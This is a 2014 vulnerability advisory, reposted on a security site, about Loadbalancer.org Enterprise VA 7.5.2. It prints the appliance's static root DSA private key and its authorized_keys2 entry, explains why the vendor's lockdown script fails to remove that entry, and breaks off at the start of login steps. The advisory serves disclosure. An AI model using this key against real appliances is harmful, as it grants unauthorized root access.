Loadbalancer.org Enterprise VA 7.5.2

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key

来源：xistence[at]0x90[.]nl 作者：xistence 发布时间：2014-03-20

-----------

Author:

-----------

xistence < xistence[at]0x90[.]nl >

-------------------------

Affected products:

-------------------------

Loadbalancer.org Enterprise VA 7.5.2 and below

-------------------------

Affected vendors:

-------------------------

Loadbalancer.org

http://www.loadbalancer.org/

-------------------------

Product description:

-------------------------

The Loadbalancer.org Virtual Appliance is a revolution in software load

balancing. The software is simple to install on Windows, Mac & Linux and

does not have any adverse effects on the host operating system.

----------

Details:

----------

[ 0x01 - SSH Private Key ]

Loadbalancer.org Enterprise VA 7.5.2 contains a default SSH private key:

[root@lbmaster .ssh]# cat id_dsa

-----BEGIN DSA PRIVATE KEY-----

MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW

Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd

yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ

rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+

t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW

cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY

TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1

MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl

2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH

SzmJVCWFyVuuANR2Bnc=

-----END DSA PRIVATE KEY-----

And a authorized_keys2:

[root@lbmaster .ssh]# cat authorized_keys2

ssh-dss

AAAAB3NzaC1kc3MAAACBAKwKBw7D4OA1H/uD4htdh04TBIHdbSjeXUSnWJsce8C0tvoB01Yarjv9TFj+tfeDYVWtUK1DA1JkyqSuoAtDANJzF4I6Isyd0KPrW3dHFTcg6Xlz8d3KEaHokY93NOmB/xWEkhme8b7Q0U2iZie2pgWbTLXV0FA+lhskTtPHW3+VAAAAFQDRyayUlVZKXEweF3bUe03zt9e8VQAAAIAEPK1k3Y6ErAbIl96dnUCnZjuWQ7xXy062pf63QuRWI6LYSscm3f1pEknWUNFr/erQ02pkfi2eP9uHl1TI1ql+UmJX3g3frfssLNZwWXAW0m8PbY3HZSs+f5hevM3ua32pnKDmbQ2WpvKNyycKHi81hSI14xMcdblJolhN5iY8/wAAAIAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkA==

root@lbslave

The manual says the following:

---

Appliance Security Lockdown Script

To ensure that the appliance is secure it's recommended that a number of

steps should be carried out.

These steps have been incorporated into a lockdown script which can be run

at the console (recommended) or via a terminal session.

The script helps to lock down the following:

- the password for the 'loadbalancer' Web User Interface account

- the password for the Linux 'root' account

- which subnet / host is permitted access to the load balancer

It also regenerates the SSH keys that are used to secure communicating

between the master and slave appliance.

To start the script, at the console or via an SSH terminal session run the

following command:

lbsecure

---

However, the lbsecure script will regenerate the id_dsa/id_dsa.pub, but the

authorized_keys2 will remain untouched.

This makes it still possible to login using the key, without any password!

Create a file "lb" containing the key:

$ cat lb